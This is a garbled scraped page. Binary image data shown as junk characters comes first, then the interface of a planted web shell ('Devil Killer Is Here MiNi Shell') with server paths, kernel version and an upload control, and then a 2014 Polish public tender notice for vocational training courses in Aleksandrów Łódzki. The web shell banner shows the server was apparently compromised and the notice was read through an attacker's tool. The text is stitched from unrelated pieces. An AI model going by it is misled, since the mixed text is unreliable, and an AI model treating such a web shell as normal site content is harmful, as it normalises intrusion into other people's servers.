JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140709/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20140709/229602-N-2014.html

<p class="kh_header"><b>Aleksandrów Łódzki: Postępowanie o udzielenie zamówienia publicznego na zorganizowanie i przeprowadzenie szkoleń zawodowych uczestników projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 229602 - 2014; data zamieszczenia: 09.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Pomocy Społecznej , ul. Piotrkowska 4/6, 95-070 Aleksandrów Łódzki, woj. łódzkie, tel. 042 7121611, faks 042 7121611.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia publicznego na zorganizowanie i przeprowadzenie szkoleń zawodowych uczestników projektu systemowego Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest zorganizowanie  i przeprowadzenie  szkoleń zawodowych. Przedmiot zamówienia składa się z 4 części:  
1) Cz. 1 - sprzedawca  
2) Cz. 2 - bukieciarz i elementy decupage oraz elementy przedsiębiorczości 
3) Cz. 3 - kierowca operator wózków jezdniowych  
4) Cz. 4 - kucharz.
Uczestnikami szkoleń będą osoby biorące udział w projekcie systemowym Nowe Perspektywy współfinansowanym ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego  
Wykonawca w trakcie realizacji szkoleń zobowiązany jest do :
1)  zapewnienia uczestnikom w trakcie trwania  szkoleń/szkolenia bezpiecznych i higienicznych warunków nauki i praktyki, a w szczególności:
a) pomieszczenia w których będą realizowane zajęcia szkoleniowe muszą być dostosowane do prowadzenia zajęć dla liczby osób  objętych danym szkoleniem,
b) każdy uczestnik szkolenia musi mieć zapewnione miejsce siedzące, stolik,ławkę bądź krzesło z przystawką umożliwiające swobodne sporządzanie notatek,
c) sale zajęciowe do prowadzenia szkoleń w grupach muszą być wyposażone np. w: flipchart lub tablicę klasyczną lub magnetyczną oraz sprzęt audiowizualny w zależności od potrzeb szkoleniowych, 
2) prowadzenia indywidualizacji kształcenia poprzez stałą ocenę postępów poszczególnych uczestników szkoleń, szkolenia i zwiększenia pomocy osobom napotykającym trudności w procesie nauczania, 
3) zapoznania uczestników przed rozpoczęciem zajęć  z ich  szczegółowym harmonogramem i programem,zakresem tematycznym kursu,szkolenia; przekazania 1 egzemplarza harmonogramu  Zamawiającemu,
4) zapewnienia każdemu uczestnikowi materiałów dydaktycznych, notatników i długopisów,
5) przeprowadzenia szkoleń zgodnie z ustaloną liczbą godzin i harmonogramem, bez względu na ewentualne przerwy np.: choroby wykładowców,  dni wolne od pracy, awarie itp.,
6) prowadzenia dokumentacji tj.: dziennika zajęć edukacyjnych zawierającego listę obecności uczestników, wymiar godzin i tematy zajęć edukacyjnych, protokółu z egzaminu; rejestru wydanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskane kwalifikacje; list potwierdzających odbiór cateringu, materiałów dydaktycznych, notatników, długopisów oraz korzystanie z  transportu przez uczestników szkoleń,
7) przekazania Zamawiającemu dokumentacji określonej w pkt. 6) najpóźniej w ciągu 7 dni od daty zakończenia szkoleń, szkolenia, kursu w formie kserokopii potwierdzonej za zgodność z oryginałem,
8) prowadzenia list obecności ze szczególną starannością i niezwłocznie informowanie o utrudnieniach w realizacji programu zajęciowego z powodu np.: nieobecności osób uczestniczących.
9) przeprowadzenia wśród uczestników zajęć oceny merytorycznej ich przebiegu na podstawie ankiet oceniających oraz dostarczenie ich Zamawiającemu wraz z  ich zestawieniem i analizą wyników  w ciągu 7 dni od daty zakończenia zajęć,
10) opatrzenia wszystkich przygotowywanych materiałów przekazanymi przez Zamawiającego logo projektu,
11) zapewnienia uczestnikom szkoleń cateringu w formie serwisu kawowego, ciast, ciastek  i przerwę na catering,
12) zapewnienia uczestnikom szkoleń transportu z Aleksandrowa Łódzkiego do miejsca nauki i z powrotem na koszt Wykonawcy.
13)Wykonawca zapewnia wykonywanie zamówienia przy pomocy  kadry szkolącej posiadającej uprawnienia, wiedzę i doświadczenie w prowadzeniu zajęć dla osób zagrożonych wykluczeniem społecznym,
14) szkolenia grupowe prowadzone mogą być od poniedziałku do soboty. Preferowany czas prowadzonych w grupach zajęć kursowych określonych jako cz. 1, 2, 3, 4 w godzinach 9:00-20:00. 
15) po zakończeniu  każdego szkolenia Wykonawca zobowiązany jest do przeprowadzenia egzaminu sprawdzającego wiadomości i umiejętności każdego z uczestników z tematyki przewidzianej w programie nauczania oraz wydania zaświadczenia na druku MEN , w przypadku szkolenia kursowego pn. Kierowca operator wózków jezdniowych również uprawnień z UDT (co poświadczy jego ukończenie) zgodnie z aktualnie obowiązującymi  standardami. 
16) uczestnikom szkoleń oznaczonych jako cz.1,2,3,4  Wykonawca wyda dodatkowo certyfikat lub dyplom wraz z zestawem logo projektu z informacją o współfinansowaniu projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w języku polskim. 
17) Wykonawca jest odpowiedzialny za jakość wykonywanych usług zgodną z opisem przedmiotu zamówienia. 
18) zajęcia zostaną przeprowadzone przez szkolących Wykonawcy. W razie nieprzewidzianych zdarzeń losowych Wykonawca zapewni zastępstwo szkolących wyłącznie przez kompetentne osoby, posiadające kwalifikacje i uprawnienia co najmniej takie jak szkolący, na swój koszt i ryzyko.
19) Osoby realizujące zadania, szkolenia czy kursy w ramach NSRO zobowiązane są do prowadzenia miesięcznej ewidencji godzin i zadań, tak by ich łączne zaangażowanie zawodowe w realizację wszystkich projektów finansowanych z funduszy strukturalnych i Funduszu Spójności oraz działań finansowanych z innych źródeł, w tym środków własnych Beneficjenta i innych podmiotów, nie przekraczało 240 godzin miesięcznie. (*) 
(*)Wytyczne w zakresie kwalifikowania wydatków w ramach PO KL - obowiązują od 1 maja 2014 roku.  Powyższe dotyczy wszelkich form zaangażowania  zawodowego, w szczególności w ramach stosunku pracy, stosunku cywilnoprawnego i samo zatrudnienia, zaangażowania w ramach prowadzenia własnej działalności gospodarczej.                                                                                                 
 20) Wykonawca przedstawia program zajęć szkoleniowych wg. zał. nr 7 uwzględniając moduły programowe określone  w częściach:  1, 2, 3, 4, w niniejszym SIWZ..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 25.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeśli Wykonawcza wykaże, że jest wpisany do rejestru instytucji szkolących Wojewódzkiego Urzędu Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy ( tekst jednolity Dz.U. Nr 69 z 32008r. poz. 415 z późn.  zm.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli: - Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych, również wykonuje trzy usługi polegające na zorganizowaniu i przeprowadzeniu szkoleń/ warsztatów o tematyce zgodnej z opisem tej części przedmiotu zamówienia do której Wykonawca przystępuje</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca zamieści w ofercie wykaz narzędzi potrzebnych do realizacji zamówienia wraz z informacją o podstawie dysponowania tymi zasobami</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca zamieści w ofercie  wykaz osób, które będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia i wykaże, że prowadziły one w ciągu ostatnich trzech lat trzy szkolenia o podobnej tematyce</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna powyższy warunek za spełniony, jeżeli Wykonawca przedstawi opłacona polisę OC w zakresie prowadzonej działalności, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wpis do rejestru instytucji szkolących Wojewódzkiego Urzędu Pracy, właściwy ze względu na siedzibę instytucji szkoleniowej zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 roku o promocji zatrudnienia i instytucjach rynku pracy ( tekst jednolity Dz.U. Nr 69 z 32008r. poz. 415 z późn.  zm.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.aleksandrowlodzki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Pomocy Społecznej w Aleksandrowie Łódzkim ul. Piotrkowska 4/6, 95-070 Aleksandrów Łódzki.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2014 godzina 10:00, miejsce: Ośrodek Pomocy Społecznej w Aleksandrowie Łódzkim ul. Piotrkowska 4/6, 95-070 Aleksandrów Łódzki.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt systemowy Nowe Perspektywy współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> SPRZEDAWCA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres pracy: pracownik działu sprzedaży
Kod zawodu: 522107
a) szkolenie będzie prowadzone dla  7 osób skierowanych przez Zamawiającego,
b) ogólne cele szkolenia: program adresowany jest do osób, które chcą uzyskać bądź rozszerzyć swoje kompetencje i umiejętności dla zwiększenia mobilności zawodowej
c) modułowy program szkolenia zawodowego obejmuje 176 godzin i następujące moduły:
- przestrzeganie zasad bezpieczeństwa i higieny pracy w jednostce handlowej,
- organizacja handlu w gospodarce rynkowej,
- wyposażanie punktu sprzedaży detalicznej, 
- organizacja zaopatrzenia i przyjmowanie dostaw towarów,
- wykonywanie i dokumentowanie podstawowych obliczeń sklepowych, 
- obsługiwanie klienta, przebieg sprzedaży detalicznej,
d) szkolenie obejmuje 176  godzin dydaktycznych (1 godzina = 45 minut) dla 1 uczestnika szkolenia, w tym zajęcia teoretyczne oraz praktyczne,
e) Wykonawca podczas praktycznej nauki zawodu zapewnia co najmniej  jedno stanowisko (w szczególności kasowe)  dla dwóch uczestników szkolenia,
f) Wykonawca w ramach szkolenia zapewnia  wyrobienie każdemu uczestnikowi książeczki sanepidu oraz zapoznanie z minimum sanitarnym, które  dotyczy odpowiednio charakteru pracy: higieny żywności, stosowania zasad HACCP, stosowania zasad GHP i GMP (dobrej praktyki higieniczno-produkcyjnej),
g) badanie osiągnięcia założonych celów odbywać się będzie podczas  egzaminów sprawdzających poziom zdobytej wiedzy i  umiejętności każdego uczestnika , potwierdzony wydanymi certyfikatami z logo projektu  i zaświadczeniem MEN.
Zamawiający zastrzega sobie prawo skierowania mniejszej  ilości osób na szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 25.08.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> BUKIECIARZ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zakres pracy: projektowanie i wykonywanie wyrobów bukieciarskich
Kod zawodu: 522102
oraz elementy decupage i elementy przedsiębiorczości
a) Wykonawca będzie prowadzić szkolenie dla 7 osób skierowanych przez Zamawiającego,
b) ogólne cele szkolenia - bukieciarz: podstawowym celem programu jest kształcenie pracowników do najbardziej rozpowszechnionych na rynku pracy zakładów - kwiaciarni. Program zakłada, że uczestnik szkolenia będzie potrafił wykonać dowolną dekorację pogrzebową, wiązankę ślubną i okolicznościową, ułożyć kwiaty w naczyniach, wykonać dekorację na Boże Narodzenie, utrwalać rośliny różnymi metodami i obejmuje średni poziom szkolenia oparty przede wszystkim na ćwiczeniach i pokazach uzupełnianych wskazówkami teoretycznymi.
c) modułowy program szkolenia zawodowego z zakresu bukieciarstwa obejmuje 120 godzin i następujące moduły:
- utrwalanie roślin
- dekoracje pogrzebowe
- wyroby ślubne i komunijne
- wiązanki i dekoracje okolicznościowe.
a modułowy program dotyczący elementów decupage i elementów przedsiębiorczości obejmuje 60 godzin i następujące moduły:
- pakowanie prezentów z wykorzystaniem metody decupage,
- obsługę kas fiskalnych i terminalu płatniczego,
- elementy przedsiębiorczości.
Łącznie szkolenie z części 2 będzie realizowane przez 180 godzin 
d) szkolenie z bukieciarstwa z elementów decupage i z elementów przedsiębiorczości obejmuje minimum 180 godzin dydaktycznych (1 godzina = 45 minut) dla 1 uczestnika szkolenia, w tym zajęcia teoretyczne oraz praktyczne,
e) w ramach szkolenia z bukieciarstwa  Wykonawca organizuje jednodniowy pobyt w łódzkim Ogrodzie Botanicznym lub w łódzkiej Palmiarni lub w Arboretum k- Rogowa, oraz dwudniowe zajęcia praktyczne w kwiaciarni pod nadzorem opiekuna,
h) Wykonawca podczas praktycznej nauki zawodu zapewnia co najmniej jedno stanowisko dla dwóch uczestników szkolenia,
i) Wykonawca w ramach szkolenia zapewnia  wyrobienie każdemu uczestnikowi książeczki sanepidu oraz zapoznanie z minimum sanitarnym, które  dotyczy odpowiednio charakteru pracy: higieny żywności, stosowania zasad HACCP, stosowania zasad GHP i GMP (dobrej praktyki higieniczno-produkcyjnej),
j) badanie osiągnięcia założonych celów odbywać się będzie podczas  egzaminów sprawdzających poziom zdobytej wiedzy i  umiejętności każdego uczestnika, potwierdzony wydanymi certyfikatami z logo projektu  i zaświadczeniem MEN.
